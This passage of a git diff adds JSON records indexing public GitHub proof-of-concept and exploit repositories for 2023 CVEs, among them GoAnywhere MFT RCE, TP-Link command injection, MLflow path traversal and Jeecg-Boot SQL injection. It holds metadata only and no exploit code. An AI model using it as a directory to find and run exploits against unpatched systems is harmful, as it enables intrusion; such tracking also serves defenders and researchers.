"subscribers_count": 1 + }, + { + "id": 606615026, + "name": "CVE-2023-0669-Analysis", + "full_name": "yosef0x01\/CVE-2023-0669-Analysis", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-0669-Analysis", + "description": "CVE analysis for CVE-2023-0669", + "fork": false, + "created_at": "2023-02-26T02:33:54Z", + "updated_at": "2024-08-12T20:29:58Z", + "pushed_at": "2023-03-12T17:37:44Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624244077, + "name": "CVE-2023-0669", + "full_name": "Avento\/CVE-2023-0669", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-0669", + "description": "GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Deserialization Vulnerabilities Python RCE PoC(Proof of Concept)", + "fork": false, + "created_at": "2023-04-06T03:40:03Z", + "updated_at": "2024-04-19T22:37:59Z", + "pushed_at": "2023-07-07T10:42:46Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-0669", + "deserialization-vulnerabilities", + "licenseresponseservlet" + ], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0748.json b/2023/CVE-2023-0748.json new file mode 100644 index 0000000000..ff72f8c653 --- /dev/null +++ b/2023/CVE-2023-0748.json @@ -0,0 +1,33 @@ +[ + { + "id": 600124909, + "name": "CVE-2023-0748", + "full_name": "gonzxph\/CVE-2023-0748", + "owner": { + "login": "gonzxph", + "id": 58154356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58154356?v=4", + "html_url": "https:\/\/github.com\/gonzxph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gonzxph\/CVE-2023-0748", + "description": "BTCPayServer version 1.7.5 and below is vulnerable for Open Redirection attack.", + "fork": false, + "created_at": "2023-02-10T16:32:48Z", + "updated_at": "2023-02-10T16:46:58Z", + "pushed_at": "2023-02-11T02:22:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-08.json b/2023/CVE-2023-08.json new file mode 100644 index 0000000000..b95a36728a --- /dev/null +++ b/2023/CVE-2023-08.json @@ -0,0 +1,33 @@ +[ + { + "id": 690906596, + "name": "CVE-2023-08-21-exploit", + "full_name": "amirzargham\/CVE-2023-08-21-exploit", + "owner": { + "login": "amirzargham", + "id": 133110721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4", + "html_url": "https:\/\/github.com\/amirzargham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amirzargham\/CVE-2023-08-21-exploit", + "description": "Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS", + "fork": false, + "created_at": "2023-09-13T05:59:02Z", + "updated_at": "2023-09-24T07:34:00Z", + "pushed_at": "2024-02-10T05:04:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0830.json b/2023/CVE-2023-0830.json new file mode 100644 index 0000000000..33822506ff --- /dev/null +++ b/2023/CVE-2023-0830.json @@ -0,0 +1,33 @@ +[ + { + "id": 660251840, + "name": "CVE-2023-0830", + "full_name": "xbz0n\/CVE-2023-0830", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2023-0830", + "description": "Exploit for EasyNAS version 1.1.0. The vulnerability exploited is a command injection flaw, which requires authentication.", + "fork": false, + "created_at": "2023-06-29T15:23:06Z", + "updated_at": "2024-06-04T10:48:14Z", + "pushed_at": "2023-06-29T15:29:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0860.json b/2023/CVE-2023-0860.json new file mode 100644 index 0000000000..fa39424667 --- /dev/null +++ b/2023/CVE-2023-0860.json @@ -0,0 +1,33 @@ +[ + { + "id": 602570539, + "name": "CVE-2023-0860", + "full_name": "0xsu3ks\/CVE-2023-0860", + "owner": { + "login": "0xsu3ks", + "id": 97468816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97468816?v=4", + "html_url": "https:\/\/github.com\/0xsu3ks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xsu3ks\/CVE-2023-0860", + "description": null, + "fork": false, + "created_at": "2023-02-16T13:49:20Z", + "updated_at": "2023-02-16T13:49:20Z", + "pushed_at": "2023-02-16T13:55:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0861.json b/2023/CVE-2023-0861.json new file mode 100644 index 0000000000..ed661d6fea --- /dev/null +++ b/2023/CVE-2023-0861.json @@ -0,0 +1,33 @@ +[ + { + "id": 613034339, + "name": "CVE-2023-0861-POC", + "full_name": "seifallahhomrani1\/CVE-2023-0861-POC", + "owner": { + "login": "seifallahhomrani1", + "id": 29190315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29190315?v=4", + "html_url": "https:\/\/github.com\/seifallahhomrani1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seifallahhomrani1\/CVE-2023-0861-POC", + "description": "Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers", + "fork": false, + "created_at": "2023-03-12T17:43:00Z", + "updated_at": "2024-09-19T13:58:55Z", + "pushed_at": "2023-03-16T19:17:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1112.json b/2023/CVE-2023-1112.json new file mode 100644 index 0000000000..fce55b885d --- /dev/null +++ b/2023/CVE-2023-1112.json @@ -0,0 +1,33 @@ +[ + { + "id": 597274682, + "name": "Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal", + "full_name": "Nickguitar\/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal", + "owner": { + "login": "Nickguitar", + "id": 3837916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3837916?v=4", + "html_url": "https:\/\/github.com\/Nickguitar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nickguitar\/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal", + "description": "Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal (CVE-2023-1112)", + "fork": false, + "created_at": "2023-02-04T03:03:05Z", + "updated_at": "2024-11-12T11:51:38Z", + "pushed_at": "2023-03-07T01:31:57Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1177.json b/2023/CVE-2023-1177.json new file mode 100644 index 0000000000..5e2a7d58ad --- /dev/null +++ b/2023/CVE-2023-1177.json @@ -0,0 +1,163 @@ +[ + { + "id": 627221018, + "name": "ml-CVE-2023-1177", + "full_name": "hh-hunter\/ml-CVE-2023-1177", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/ml-CVE-2023-1177", + "description": null, + "fork": false, + "created_at": "2023-04-13T02:56:24Z", + "updated_at": "2023-04-13T02:56:31Z", + "pushed_at": "2024-01-10T01:25:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 669753010, + "name": "CVE-2023-1177-MLFlow", + "full_name": "iumiro\/CVE-2023-1177-MLFlow", + "owner": { + "login": "iumiro", + "id": 100076479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100076479?v=4", + "html_url": "https:\/\/github.com\/iumiro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iumiro\/CVE-2023-1177-MLFlow", + "description": "CVE for 2023", + "fork": false, + "created_at": "2023-07-23T10:12:27Z", + "updated_at": "2023-08-03T10:17:43Z", + "pushed_at": "2023-08-03T10:10:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721284951, + "name": "CVE-2023-1177-rebuild", + "full_name": "tiyeume25112004\/CVE-2023-1177-rebuild", + "owner": { + "login": "tiyeume25112004", + "id": 77606941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77606941?v=4", + "html_url": "https:\/\/github.com\/tiyeume25112004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiyeume25112004\/CVE-2023-1177-rebuild", + "description": "Learn more things, not suck all things", + "fork": false, + "created_at": "2023-11-20T18:32:46Z", + "updated_at": "2023-11-20T18:37:25Z", + "pushed_at": "2023-11-20T18:36:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845632603, + "name": "MLflow-Vuln", + "full_name": "saimahmed\/MLflow-Vuln", + "owner": { + "login": "saimahmed", + "id": 25364793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25364793?v=4", + "html_url": "https:\/\/github.com\/saimahmed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saimahmed\/MLflow-Vuln", + "description": "MLflow LFI\/RFI Vulnerability -CVE-2023-1177 - Reproduced", + "fork": false, + "created_at": "2024-08-21T16:11:31Z", + "updated_at": "2024-09-01T03:56:50Z", + "pushed_at": "2024-09-01T03:56:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859830353, + "name": "CVE-2023-1177", + "full_name": "charlesgargasson\/CVE-2023-1177", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2023-1177", + "description": "MLFlow Path Traversal", + "fork": false, + "created_at": "2024-09-19T10:59:31Z", + "updated_at": "2024-09-19T11:04:13Z", + "pushed_at": "2024-09-19T11:02:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-1177", + "exploit", + "mlflow", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1326.json b/2023/CVE-2023-1326.json new file mode 100644 index 0000000000..b7ce04a756 --- /dev/null +++ b/2023/CVE-2023-1326.json @@ -0,0 +1,126 @@ +[ + { + "id": 727965226, + "name": "CVE-2023-1326-PoC", + "full_name": "diego-tella\/CVE-2023-1326-PoC", + "owner": { + "login": "diego-tella", + "id": 70545257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70545257?v=4", + "html_url": "https:\/\/github.com\/diego-tella", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diego-tella\/CVE-2023-1326-PoC", + "description": "A proof of concept for CVE-2023–1326 in apport-cli 2.26.0", + "fork": false, + "created_at": "2023-12-06T00:07:40Z", + "updated_at": "2024-11-19T15:40:00Z", + "pushed_at": "2023-12-06T12:46:08Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 743946606, + "name": "CVE-2023-1326", + "full_name": "Pol-Ruiz\/CVE-2023-1326", + "owner": { + "login": "Pol-Ruiz", + "id": 151052652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151052652?v=4", + "html_url": "https:\/\/github.com\/Pol-Ruiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pol-Ruiz\/CVE-2023-1326", + "description": "Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2023-1326", + "fork": false, + "created_at": "2024-01-16T10:20:53Z", + "updated_at": "2024-01-16T10:20:53Z", + "pushed_at": "2024-01-26T13:55:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796053569, + "name": "CVE-2023-1326", + "full_name": "n3rdh4x0r\/CVE-2023-1326", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2023-1326", + "description": null, + "fork": false, + "created_at": "2024-05-04T19:47:58Z", + "updated_at": "2024-05-05T02:19:49Z", + "pushed_at": "2024-05-04T19:56:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815018186, + "name": "CVE-2023-1326-PoC", + "full_name": "cve-2024\/CVE-2023-1326-PoC", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2023-1326-PoC", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:15:50Z", + "updated_at": "2024-06-14T07:18:15Z", + "pushed_at": "2024-06-14T07:18:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1337.json b/2023/CVE-2023-1337.json new file mode 100644 index 0000000000..d6c74ea3c4 --- /dev/null +++ b/2023/CVE-2023-1337.json @@ -0,0 +1,33 @@ +[ + { + "id": 616393433, + "name": "CVE-2023-1337", + "full_name": "Penkyzduyi\/CVE-2023-1337", + "owner": { + "login": "Penkyzduyi", + "id": 69184246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69184246?v=4", + "html_url": "https:\/\/github.com\/Penkyzduyi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Penkyzduyi\/CVE-2023-1337", + "description": "Puni love is", + "fork": false, + "created_at": "2023-03-20T09:57:53Z", + "updated_at": "2023-03-20T09:57:53Z", + "pushed_at": "2023-03-20T09:57:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1389.json b/2023/CVE-2023-1389.json new file mode 100644 index 0000000000..9a0be1f359 --- /dev/null +++ b/2023/CVE-2023-1389.json @@ -0,0 +1,64 @@ +[ + { + "id": 671741059, + "name": "CVE-2023-1389", + "full_name": "Voyag3r-Security\/CVE-2023-1389", + "owner": { + "login": "Voyag3r-Security", + "id": 140756583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140756583?v=4", + "html_url": "https:\/\/github.com\/Voyag3r-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Voyag3r-Security\/CVE-2023-1389", + "description": null, + "fork": false, + "created_at": "2023-07-28T03:09:00Z", + "updated_at": "2024-10-09T08:05:43Z", + "pushed_at": "2024-07-18T20:07:11Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689374873, + "name": "CVE-2023-1389", + "full_name": "Terminal1337\/CVE-2023-1389", + "owner": { + "login": "Terminal1337", + "id": 95563109, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95563109?v=4", + "html_url": "https:\/\/github.com\/Terminal1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Terminal1337\/CVE-2023-1389", + "description": "TP-Link Archer AX21 - Unauthenticated Command Injection [Loader]", + "fork": false, + "created_at": "2023-09-09T15:53:22Z", + "updated_at": "2024-06-09T09:56:08Z", + "pushed_at": "2023-09-09T15:58:39Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1415.json b/2023/CVE-2023-1415.json new file mode 100644 index 0000000000..a87ebee13e --- /dev/null +++ b/2023/CVE-2023-1415.json @@ -0,0 +1,33 @@ +[ + { + "id": 614268694, + "name": "CVE-2023-1415", + "full_name": "0xxtoby\/CVE-2023-1415", + "owner": { + "login": "0xxtoby", + "id": 64345433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64345433?v=4", + "html_url": "https:\/\/github.com\/0xxtoby", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxtoby\/CVE-2023-1415", + "description": null, + "fork": false, + "created_at": "2023-03-15T08:44:59Z", + "updated_at": "2023-03-17T04:50:55Z", + "pushed_at": "2023-03-15T08:48:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1430.json b/2023/CVE-2023-1430.json new file mode 100644 index 0000000000..25e7ff4c35 --- /dev/null +++ b/2023/CVE-2023-1430.json @@ -0,0 +1,33 @@ +[ + { + "id": 652556352, + "name": "CVE-2023-1430", + "full_name": "karlemilnikka\/CVE-2023-1430", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2023-1430", + "description": "Responsible disclosure of unpatched vulnerability in FluentCRM by WPManageNinja", + "fork": false, + "created_at": "2023-06-12T10:07:01Z", + "updated_at": "2023-06-12T10:40:10Z", + "pushed_at": "2024-01-27T21:15:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1454.json b/2023/CVE-2023-1454.json new file mode 100644 index 0000000000..77af6edba5 --- /dev/null +++ b/2023/CVE-2023-1454.json @@ -0,0 +1,219 @@ +[ + { + "id": 618236086, + "name": "CVE-2023-1454", + "full_name": "gobysec\/CVE-2023-1454", + "owner": { + "login": "gobysec", + "id": 50955360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50955360?v=4", + "html_url": "https:\/\/github.com\/gobysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gobysec\/CVE-2023-1454", + "description": "jeecg-boot unauthorized SQL Injection Vulnerability (CVE-2023-1454)", + "fork": false, + "created_at": "2023-03-24T03:02:33Z", + "updated_at": "2023-10-27T09:44:01Z", + "pushed_at": "2023-04-03T01:36:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 626193940, + "name": "CVE-2023-1454", + "full_name": "cjybao\/CVE-2023-1454", + "owner": { + "login": "cjybao", + "id": 61445855, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61445855?v=4", + "html_url": "https:\/\/github.com\/cjybao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cjybao\/CVE-2023-1454", + "description": "jmreport\/qurestSql 未授权SQL注入批量扫描poc", + "fork": false, + "created_at": "2023-04-11T01:41:16Z", + "updated_at": "2023-07-25T07:41:14Z", + "pushed_at": "2023-04-07T03:41:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 627250763, + "name": "CVE-2023-1454-EXP", + "full_name": "3yujw7njai\/CVE-2023-1454-EXP", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-1454-EXP", + "description": "CVE-2023-1454 jeecg-boot Unauthorized SQL injection vulnerability", + "fork": false, + "created_at": "2023-04-13T04:51:41Z", + "updated_at": "2024-06-26T04:41:26Z", + "pushed_at": "2023-04-13T04:53:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627599065, + "name": "CVE-2023-1454", + "full_name": "BugFor-Pings\/CVE-2023-1454", + "owner": { + "login": "BugFor-Pings", + "id": 96440773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96440773?v=4", + "html_url": "https:\/\/github.com\/BugFor-Pings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BugFor-Pings\/CVE-2023-1454", + "description": "CVE-2023-1454漏洞检测脚本", + "fork": false, + "created_at": "2023-04-13T19:56:47Z", + "updated_at": "2023-04-13T20:33:08Z", + "pushed_at": "2023-04-13T20:33:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630844635, + "name": "CVE-2023-1454", + "full_name": "padbergpete47\/CVE-2023-1454", + "owner": { + "login": "padbergpete47", + "id": 61945676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61945676?v=4", + "html_url": "https:\/\/github.com\/padbergpete47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/padbergpete47\/CVE-2023-1454", + "description": "CVE-2023-1454,Jeecg-Boot 前台SQL注入,CVE-2023-1454批量检测", + "fork": false, + "created_at": "2023-04-21T09:27:45Z", + "updated_at": "2024-07-15T09:29:53Z", + "pushed_at": "2023-04-21T09:39:29Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656080043, + "name": "CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln", + "full_name": "Sweelg\/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln", + "owner": { + "login": "Sweelg", + "id": 86879265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879265?v=4", + "html_url": "https:\/\/github.com\/Sweelg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sweelg\/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln", + "description": "jmreport\/qurestSql 未授权SQL注入批量扫描poc Jeecg-Boot是一款基于Spring Boot和Jeecg-Boot-Plus的快速开发平台,最新的jeecg-boot 3.5.0 中被爆出多个SQL注入漏洞。", + "fork": false, + "created_at": "2023-06-20T08:12:49Z", + "updated_at": "2024-09-13T07:08:03Z", + "pushed_at": "2023-06-20T08:51:47Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737472483, + "name": "CVE-2023-1454-EXP", + "full_name": "shad0w0sec\/CVE-2023-1454-EXP", + "owner": { + "login": "shad0w0sec", + "id": 73059812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73059812?v=4", + "html_url": "https:\/\/github.com\/shad0w0sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shad0w0sec\/CVE-2023-1454-EXP", + "description": "JeecgBoot SQL(CVE-2023-1454)sqlmap 注入不出来的情况可以使用该脚本", + "fork": false, + "created_at": "2023-12-31T06:47:01Z", + "updated_at": "2024-09-08T04:48:34Z", + "pushed_at": "2024-01-10T08:09:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1488.json b/2023/CVE-2023-1488.json new file mode 100644 index 0000000000..8b29197a4e --- /dev/null +++ b/2023/CVE-2023-1488.json @@ -0,0 +1,33 @@ +[ + { + "id": 872735551, + "name": "CVE-2023-1488", + "full_name": "bxtshit\/CVE-2023-1488", + "owner": { + "login": "bxtshit", + "id": 132420742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132420742?v=4", + "html_url": "https:\/\/github.com\/bxtshit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bxtshit\/CVE-2023-1488", + "description": "CVE + VDM Controls", + "fork": false, + "created_at": "2024-10-15T01:32:39Z", + "updated_at": "2024-10-18T20:50:15Z", + "pushed_at": "2024-10-18T20:50:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1498.json b/2023/CVE-2023-1498.json new file mode 100644 index 